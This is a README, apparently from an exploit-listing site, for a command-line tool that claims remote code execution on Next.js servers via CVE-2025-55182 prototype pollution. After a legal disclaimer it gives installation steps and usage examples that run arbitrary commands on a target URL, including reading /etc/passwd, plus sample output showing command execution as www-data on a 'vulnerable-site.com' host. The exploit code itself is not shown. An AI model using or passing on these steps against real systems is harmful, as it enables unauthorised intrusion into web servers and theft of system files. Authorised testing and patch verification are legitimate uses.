## https://sploitus.com/exploit?id=CF0E13FC-1960-5EF7-B01D-5543FF8C320E
# CVE-2025-55182 Next.js RCE Exploit Tool
[δΈζζζ‘£](./README.zh-CN.md) | [ζΌζ΄εηεζ](./EXPLOIT.md)
---
> [!CAUTION]
> ## β οΈ DISCLAIMER - READ BEFORE USE
>
> **This tool is intended ONLY for:**
> - Security researchers conducting vulnerability verification
> - Authorized penetration testing with explicit permission
> - Educational and learning purposes
>
> **Unauthorized access to computer systems is ILLEGAL.**
>
> By using this tool, you agree that:
> 1. You have obtained proper authorization before testing any system
> 2. You will not use this tool for malicious purposes
> 3. You are solely responsible for your actions and any consequences
>
> **The author assumes NO liability for misuse of this tool.**
---
A remote code execution (RCE) exploit tool for Next.js server-side prototype pollution vulnerability.
## Vulnerability Overview
CVE-2025-55182 is a critical security vulnerability affecting Next.js that allows attackers to achieve remote code execution through crafted requests exploiting prototype pollution.
> π For detailed technical analysis, see [EXPLOIT.md](./EXPLOIT.md)
### Affected Versions
- Specific versions of Next.js (refer to official security advisory)
### How It Works
This vulnerability exploits the Next.js Server Actions request handling mechanism, achieving arbitrary code execution through `__proto__` prototype chain pollution combined with the `Function` constructor.
## Installation
```bash
# Using yarn
yarn install
# Using npm
npm install
```
## Usage
### Direct Execution
```bash
# Basic usage
node index.js [command]
# Examples
node index.js http://localhost:3000
node index.js http://localhost:3000 "ls -la"
node index.js http://localhost:3000 "cat /etc/passwd"
```
### Using yarn scripts
```bash
# Run the tool
yarn start http://localhost:3000 "whoami"
# Or use alias
yarn exploit http://localhost:3000 "ls -la"
# Show help
yarn help
```
### Global CLI Installation
```bash
# Link globally
yarn link
# or
npm link
# Then use the command directly
cve-2025-55182 http://localhost:3000
cve-2025-55182 http://localhost:3000 "whoami"
# Unlink
yarn unlink
```
## CLI Options
```
Usage:
cve-2025-55182 [command]
Arguments:
url Target URL (required)
command Command to execute (default: whoami)
Options:
-h, --help Show help message
-v, --version Show version number
```
## Output Format
The tool outputs results in JSON format:
### Successful Execution
```json
{
"success": true,
"message": "",
"data": "command execution result"
}
```
### Failed Execution
```json
{
"success": false,
"message": "error message",
"data": null
}
```
## Example
```bash
$ cve-2025-55182 http://vulnerable-site.com "id"
{
"success": true,
"message": "",
"data": "uid=1000(www-data) gid=1000(www-data) groups=1000(www-data)"
}
```
## Dependencies
- [axios](https://github.com/axios/axios) - HTTP client
- [form-data](https://github.com/form-data/form-data) - FormData builder
## References
- [Refer to Python scripts](https://github.com/msanft/CVE-2025-55182)